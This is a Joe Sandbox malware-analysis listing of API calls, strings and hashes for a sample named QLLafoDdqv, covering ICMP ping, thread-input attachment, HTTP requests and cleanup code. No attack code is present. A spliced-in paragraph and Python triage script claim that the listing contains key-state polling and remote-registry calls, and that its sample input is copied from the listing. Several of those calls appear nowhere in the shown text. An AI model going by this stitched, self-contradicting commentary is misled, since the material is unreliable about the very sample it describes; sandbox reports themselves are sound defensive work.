              • Opcode ID: fb361379aad0776e414fa5a19382949fe7b27a2882a2f76306813bcc5f1e7414
              • Instruction ID: 6d32a2f2b0f9efbf5ff9596b3831d434f2d91112b2025aa6cb171632a572426d
              • Opcode Fuzzy Hash: fb361379aad0776e414fa5a19382949fe7b27a2882a2f76306813bcc5f1e7414
              • Instruction Fuzzy Hash: BC41B5346047CA69FF719674C8053B6BEA06F11344F08805ADBC7566C3EBED99D8CBA2
              APIs
              • WSAStartup.WSOCK32(00000101,?), ref: 007505BC
              • inet_addr.WSOCK32(?), ref: 0075061C
              • gethostbyname.WSOCK32(?), ref: 00750628
              • IcmpCreateFile.IPHLPAPI ref: 00750636
              • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 007506C6
              • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 007506E5
              • IcmpCloseHandle.IPHLPAPI(?), ref: 007507B9
              • WSACleanup.WSOCK32 ref: 007507BF
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
               • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
              • String ID: Ping
              • API String ID: 1028309954-2246546115
              • Opcode ID: c72f6a475a4eefc2d6ece88d8da6e0dbebf22bb95da03995c9603bdf400f210f
              • Instruction ID: feb911616852a11f65a144d2db004482e7efd395c37ba8469346978a71fce0e8
              • Opcode Fuzzy Hash: c72f6a475a4eefc2d6ece88d8da6e0dbebf22bb95da03995c9603bdf400f210f
              • Instruction Fuzzy Hash: 7B918D755042019FD720CF15C488F5ABBE1EF48318F1489A9E86A8B7A2D7B8ED49CFD1
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
               • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: _wcslen$BuffCharLower
              • String ID: cdecl$none$stdcall$winapi
              • API String ID: 707087890-567219261
              • Opcode ID: 5c643f9dc279783118a9dc3de1e2d3a1fd070a837c8a66843c51095ff92acf33
              • Instruction ID: a7b34931148121a93e99812c5ecf47b64bce4b8377e0ade6bc4057e9b4f34c78
              • Opcode Fuzzy Hash: 5c643f9dc279783118a9dc3de1e2d3a1fd070a837c8a66843c51095ff92acf33
              • Instruction Fuzzy Hash: 8751AE31A001169BCB94DF68C8419FEB3B2AF69721B204229E866F7284DFB9DD44C791
              APIs
              • CoInitialize.OLE32 ref: 00753774
              • CoUninitialize.OLE32 ref: 0075377F
              • CoCreateInstance.OLE32(?,00000000,00000017,0076FB78,?), ref: 007537D9
              • IIDFromString.OLE32(?,?), ref: 0075384C
              • VariantInit.OLEAUT32(?), ref: 007538E4
              • VariantClear.OLEAUT32(?), ref: 00753936
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
               • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
              • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
              • API String ID: 636576611-1287834457
              • Opcode ID: 4cc741089aa3eeca5cf264f1aa6b29aff0cb5bc83ac1cd052b50c9dec4f16bd3
              • Instruction ID: 463e6d4598e71809c39e55dd969ee3055a8d7088d5a7e92745fe8f3fa9fb499c
              • Opcode Fuzzy Hash: 4cc741089aa3eeca5cf264f1aa6b29aff0cb5bc83ac1cd052b50c9dec4f16bd3
              • Instruction Fuzzy Hash: 1861C4B06083019FD315DF54C889FAABBE4EF48755F00490DF985972A1D7B8EE48CBA6
              APIs
                • Part of subcall function 006E9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 006E9BB2
                • Part of subcall function 006E912D: GetCursorPos.USER32(?), ref: 006E9141
                • Part of subcall function 006E912D: ScreenToClient.USER32(00000000,?), ref: 006E915E
                • Part of subcall function 006E912D: GetAsyncKeyState.USER32(00000001), ref: 006E9183
                • Part of subcall function 006E912D: GetAsyncKeyState.USER32(00000002), ref: 006E919D
              • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?,?), ref: 00768B6B
              • ImageList_EndDrag.COMCTL32 ref: 00768B71
              • ReleaseCapture.USER32 ref: 00768B77
              • SetWindowTextW.USER32(?,00000000), ref: 00768C12
              • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00768C25
              • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?,?), ref: 00768CFF
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
               • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
              • String ID: @GUI_DRAGFILE$@GUI_DROPID$p#z
              • API String ID: 1924731296-3428299791
              • Opcode ID: d09c2f1fd0388035152ca006513814f274069e0585bf28f786c765d95c8412c7
              • Instruction ID: 0427278163f4a04506eda5804f82da71ebc179f050c7d3a8171f01216d4815d6
              • Opcode Fuzzy Hash: d09c2f1fd0388035152ca006513814f274069e0585bf28f786c765d95c8412c7
              • Instruction Fuzzy Hash: 4D51AB70504340AFE744DF14DC5AFAA77E5FB88710F40062EF996972A2CB78AD04CB66
              APIs
              • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 007433CF
                • Part of subcall function 006D9CB3: _wcslen.LIBCMT ref: 006D9CBD
              • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 007433F0
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
               • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: LoadString$_wcslen
              • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
              • API String ID: 4099089115-3080491070
              • Opcode ID: 4d5f1c91b362c3c5f27dc170850a04f9fce42670f2beb50ddbc39bf69c709e38
              • Instruction ID: a179a63fe67848d848bab646894733614720871dcb4199b9bc08650f7e9364d0
              • Opcode Fuzzy Hash: 4d5f1c91b362c3c5f27dc170850a04f9fce42670f2beb50ddbc39bf69c709e38
              • Instruction Fuzzy Hash: 3E51F471D00219AAEF15EBE0DD46EEEB779EF04340F10416AF10572252EB392F58DB65
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
               • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: _wcslen$BuffCharUpper
              • String ID: APPEND$EXISTS$KEYS$REMOVE
              • API String ID: 1256254125-769500911
              • Opcode ID: 5aa0e9982f3e774866ad0446cf34bef2aa17330b8e9f8bbb5af3296760146114
              • Instruction ID: bcff0bc1f5e9aa95ec3128bd82eed675067377857034562d704d549b8473f148
              • Opcode Fuzzy Hash: 5aa0e9982f3e774866ad0446cf34bef2aa17330b8e9f8bbb5af3296760146114
              • Instruction Fuzzy Hash: 27410632A01026DBDB205F7DC8925BE77A5AFA1754F24422AE621DB287E739CD81C790
              APIs
              • SetErrorMode.KERNEL32(00000001), ref: 007453A0
              • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00745416
              • GetLastError.KERNEL32 ref: 00745420
              • SetErrorMode.KERNEL32(00000000,READY), ref: 007454A7
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
               • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Error$Mode$DiskFreeLastSpace
              • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
              • API String ID: 4194297153-14809454
              • Opcode ID: 9f732e74d15cd74c6a5dc1c8ca7b74b3e253f004fedcd62343a2a524719d2b2f
              • Instruction ID: 1cc20de00ed15d343bb3e455532a33f1a24b0991f87a91e164da613ff53cf3b2
              • Opcode Fuzzy Hash: 9f732e74d15cd74c6a5dc1c8ca7b74b3e253f004fedcd62343a2a524719d2b2f
              • Instruction Fuzzy Hash: 4231A075A006449FCB11DF6CD484AAA7BB4EF05305F148169E806CF393DB79DD82CB91
              APIs
              • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00763A9D
              • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00763AA0
              • GetWindowLongW.USER32(?,000000F0), ref: 00763AC7
              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00763AEA
              • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00763B62
              • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00763BAC
              • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00763BC7
              • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 00763BE2
              • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00763BF6
              • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 00763C13
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
               • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: MessageSend$LongWindow
              • String ID:
              • API String ID: 312131281-0
              • Opcode ID: 06fecd392efad6acfc20318499c4c7634008b34adbf417c5e8e45a513dab8665
              • Instruction ID: 585b4753c3fc8015170728b2b2a26f47687aceef2413ce54bc42cf5aedaaa587
              • Opcode Fuzzy Hash: 06fecd392efad6acfc20318499c4c7634008b34adbf417c5e8e45a513dab8665
              • Instruction Fuzzy Hash: 21618C75900248AFDB11DFA8CC81EEE77B8EF49700F104199FA16E72A1C778AE45DB64
              APIs
              • GetCurrentThreadId.KERNEL32 ref: 0073B151
              • GetForegroundWindow.USER32(00000000,?,?,?,?,?,0073A1E1,?,00000001), ref: 0073B165
              • GetWindowThreadProcessId.USER32(00000000), ref: 0073B16C
              • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,0073A1E1,?,00000001), ref: 0073B17B
              • GetWindowThreadProcessId.USER32(?,00000000), ref: 0073B18D
              • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,0073A1E1,?,00000001), ref: 0073B1A6
              • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,0073A1E1,?,00000001), ref: 0073B1B8
              • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,0073A1E1,?,00000001), ref: 0073B1FD
              • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,0073A1E1,?,00000001), ref: 0073B212
              • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,0073A1E1,?,00000001), ref: 0073B21D
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
               • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Thread$AttachInput$Window$Process$CurrentForeground
              • String ID:
              • API String ID: 2156557900-0
              • Opcode ID: 8bc8d425edd1d41f61a2257762b6e352dcb323e8b8c58ef0a1e890fa13140902
              • Instruction ID: 7220ce584162416e83be6269efb496293819f43cae6a7950a89e792d5cb05483
              • Opcode Fuzzy Hash: 8bc8d425edd1d41f61a2257762b6e352dcb323e8b8c58ef0a1e890fa13140902
              • Instruction Fuzzy Hash: FE317C75500308BFEB119F64DC49B7FBBAABB92311F10C115FA06DA192D7BC9A408F68
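The entries above for the modifier-key polling loop (GetAsyncKeyState/GetKeyState on VK_LSHIFT, VK_RSHIFT, VK_CONTROL, VK_MENU and VK_LWIN), the foreground-window AttachThreadInput sequence, the WNetAddConnection2W/RegConnectRegistryW remote-registry path and the IcmpSendEcho "Ping" routine are the ones an analyst usually wants to pull out of a long Joe Sandbox function listing. The script below is an added example, not code from Joe Sandbox or from the analysed sample: it parses lines in the "• Api.MODULE(args), ref: addr" form used on this page (including the indented "Part of subcall function" lines), decodes 8-digit hex arguments, and applies a few triage tags that are my own heuristics rather than anything the sandbox emits. The sample input is copied from four entries in this listing.

```python
"""Parse Joe Sandbox 'APIs' listing lines and tag each function by behaviour.

Added example; not code from Joe Sandbox or from the analysed sample. It
assumes the line format used in the report ("• Api.MODULE(arg,...), ref: addr");
the tag rules below are my own triage heuristics, not the sandbox's.
"""
import re
from dataclasses import dataclass

# Virtual-key codes (winuser.h) for the arguments seen in the GetKeyState entry.
VK_NAMES = {0x11: "VK_CONTROL", 0x12: "VK_MENU", 0x5B: "VK_LWIN",
            0xA0: "VK_LSHIFT", 0xA1: "VK_RSHIFT"}

LINE_RE = re.compile(
    r"^\s*(?:•\s*)?(?P<sub>Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)


@dataclass
class Call:
    api: str
    module: str
    args: list          # int for 8-digit hex literals, None for '?', str otherwise
    ref: int
    from_subcall: bool


def parse_arg(tok: str):
    tok = tok.strip()
    if tok in ("", "?"):
        return None                  # value not recovered by the disassembler
    if re.fullmatch(r"[0-9A-Fa-f]{8}", tok):
        return int(tok, 16)
    return tok                       # e.g. 'SOFTWARE\\Classes\\' or 'close all'


def parse_listing(text: str) -> list:
    """Return the Call objects found in a block of listing lines; other lines are ignored."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        args = [] if m["args"] is None else [parse_arg(a) for a in m["args"].split(",")]
        calls.append(Call(m["api"], m["module"], args, int(m["ref"], 16), m["sub"] is not None))
    return calls


def tag_behaviours(calls: list) -> set:
    """Heuristic tags (mine, not Joe Sandbox's) derived from the API sequence."""
    apis = {c.api for c in calls if not c.from_subcall}
    tags = set()
    polled = {VK_NAMES[c.args[0]] for c in calls
              if c.api in ("GetAsyncKeyState", "GetKeyState") and c.args and c.args[0] in VK_NAMES}
    if polled:
        tags.add("modifier-key-polling:" + ",".join(sorted(polled)))
    if {"GetForegroundWindow", "AttachThreadInput"} <= apis:
        tags.add("foreground-input-attach")
    if {"WNetAddConnection2W", "RegConnectRegistryW"} <= apis:
        tags.add("remote-registry")
    for c in calls:
        if c.api == "IcmpSendEcho" and len(c.args) >= 8:
            tags.add(f"icmp-echo:timeout_ms={c.args[7]}")   # 8th IcmpSendEcho arg is Timeout
            break
    return tags


def summarize(text: str) -> dict:
    calls = parse_listing(text)
    return {"calls": len(calls), "tags": sorted(tag_behaviours(calls))}


# Lines copied from four entries in the listing above, used as sample input.
SAMPLE = """\
• GetAsyncKeyState.USER32(000000A0), ref: 00739D22
• GetKeyState.USER32(00000011), ref: 00739D96
• GetAsyncKeyState.USER32(0000005B), ref: 00739DD8
• GetForegroundWindow.USER32(00000000,?,?,?,?,?,0073A1E1,?,00000001), ref: 0073B165
• AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,0073A1E1,?,00000001), ref: 0073B17B
  • Part of subcall function 006D6B57: _wcslen.LIBCMT ref: 006D6B6A
• WNetAddConnection2W.MPR(?,?,?,00000000), ref: 007307A2
• RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 007307BE
• RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\\Classes\\), ref: 007307DA
• IcmpCreateFile.IPHLPAPI ref: 00750636
• IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 007506C6
"""

if __name__ == "__main__":
    print(summarize(SAMPLE))
```

Feed it the "APIs" block of one entry at a time to tag that function; the IcmpSendEcho timeout of 0xFA0 (4000 ms) and the 5-byte request size visible in the Ping entry come straight out of the decoded argument list.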
              APIs
              • _free.LIBCMT ref: 00702C94
                • Part of subcall function 007029C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0070D7D1,00000000,00000000,00000000,00000000,?,0070D7F8,00000000,00000007,00000000,?,0070DBF5,00000000), ref: 007029DE
                • Part of subcall function 007029C8: GetLastError.KERNEL32(00000000,?,0070D7D1,00000000,00000000,00000000,00000000,?,0070D7F8,00000000,00000007,00000000,?,0070DBF5,00000000,00000000), ref: 007029F0
              • _free.LIBCMT ref: 00702CA0
              • _free.LIBCMT ref: 00702CAB
              • _free.LIBCMT ref: 00702CB6
              • _free.LIBCMT ref: 00702CC1
              • _free.LIBCMT ref: 00702CCC
              • _free.LIBCMT ref: 00702CD7
              • _free.LIBCMT ref: 00702CE2
              • _free.LIBCMT ref: 00702CED
              • _free.LIBCMT ref: 00702CFB
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
               • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: _free$ErrorFreeHeapLast
              • String ID:
              • API String ID: 776569668-0
              • Opcode ID: 6935c87624f14a5b7efff48327b01aa265184bce4f8e246b693c8540741c1431
              • Instruction ID: 43a0959efaac3c4b7e5f12627f2c72cc55203aa6845d242f33339e1b85032b3b
              • Opcode Fuzzy Hash: 6935c87624f14a5b7efff48327b01aa265184bce4f8e246b693c8540741c1431
              • Instruction Fuzzy Hash: 00119676110108EFCB02EF54D84ACDD3BA9FF05350F6146A5F9486B272D635FA519F90
              APIs
              • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 006D1459
              • OleUninitialize.OLE32(?,00000000), ref: 006D14F8
              • UnregisterHotKey.USER32(?), ref: 006D16DD
              • DestroyWindow.USER32(?), ref: 007124B9
              • FreeLibrary.KERNEL32(?), ref: 0071251E
              • VirtualFree.KERNEL32(?,00000000,00008000), ref: 0071254B
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
               • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
              • String ID: close all
              • API String ID: 469580280-3243417748
              • Opcode ID: f8023f493b59dfed156aba84ac7d78b95ed47f13adcee9215d66654ff7f8af9c
              • Instruction ID: c17395baa87b00ac904a9ad7e1a1b948bdfc85369b5e74a749bd6d1861ab054b
              • Opcode Fuzzy Hash: f8023f493b59dfed156aba84ac7d78b95ed47f13adcee9215d66654ff7f8af9c
              • Instruction Fuzzy Hash: 4FD16D31B01212DFCB19EF19C495A69F7A2BF05700F1441AEE84A6B3A2DB74AD63CF54
              APIs
              • SetWindowLongW.USER32(?,000000EB), ref: 006D5C7A
                • Part of subcall function 006D5D0A: GetClientRect.USER32(?,?), ref: 006D5D30
                • Part of subcall function 006D5D0A: GetWindowRect.USER32(?,?), ref: 006D5D71
                • Part of subcall function 006D5D0A: ScreenToClient.USER32(?,?), ref: 006D5D99
              • GetDC.USER32 ref: 007146F5
              • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00714708
              • SelectObject.GDI32(00000000,00000000), ref: 00714716
              • SelectObject.GDI32(00000000,00000000), ref: 0071472B
              • ReleaseDC.USER32(?,00000000), ref: 00714733
              • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 007147C4
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
              • String ID: U
              • API String ID: 4009187628-3372436214
              • Opcode ID: bd4fbbfd26edb954e1b415a4186b5d3f5323206b42ef5421f56b6b6277849dca
              • Instruction ID: c93a29ae5c24e2397aebaa55694c1800c22f43e1d9e75eaa266f2639d9a167bf
              • Opcode Fuzzy Hash: bd4fbbfd26edb954e1b415a4186b5d3f5323206b42ef5421f56b6b6277849dca
              • Instruction Fuzzy Hash: A371E131900205DFCF218F68C984AFA3BB6FF4A365F14426AED565A2E6C7399C81DF50
              APIs
              • LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 007435E4
                • Part of subcall function 006D9CB3: _wcslen.LIBCMT ref: 006D9CBD
              • LoadStringW.USER32(007A2390,?,00000FFF,?), ref: 0074360A
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: LoadString$_wcslen
              • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
              • API String ID: 4099089115-2391861430
              • Opcode ID: ff30329075effff287e0f063cac1a140231ec31b7f70b66b10eaf0dfd9c83950
              • Instruction ID: c37b5d2820cea2601d1c3ef607c6a45cb201f7257c41707420e4e929b4182f98
              • Opcode Fuzzy Hash: ff30329075effff287e0f063cac1a140231ec31b7f70b66b10eaf0dfd9c83950
              • Instruction Fuzzy Hash: C1517171D00259BADF15EBA0DC46EEDBB39AF04300F14412AF505722A1DB751B98DFA5
              APIs
              • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0074C272
              • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0074C29A
              • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0074C2CA
              • GetLastError.KERNEL32 ref: 0074C322
              • SetEvent.KERNEL32(?), ref: 0074C336
              • InternetCloseHandle.WININET(00000000), ref: 0074C341
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
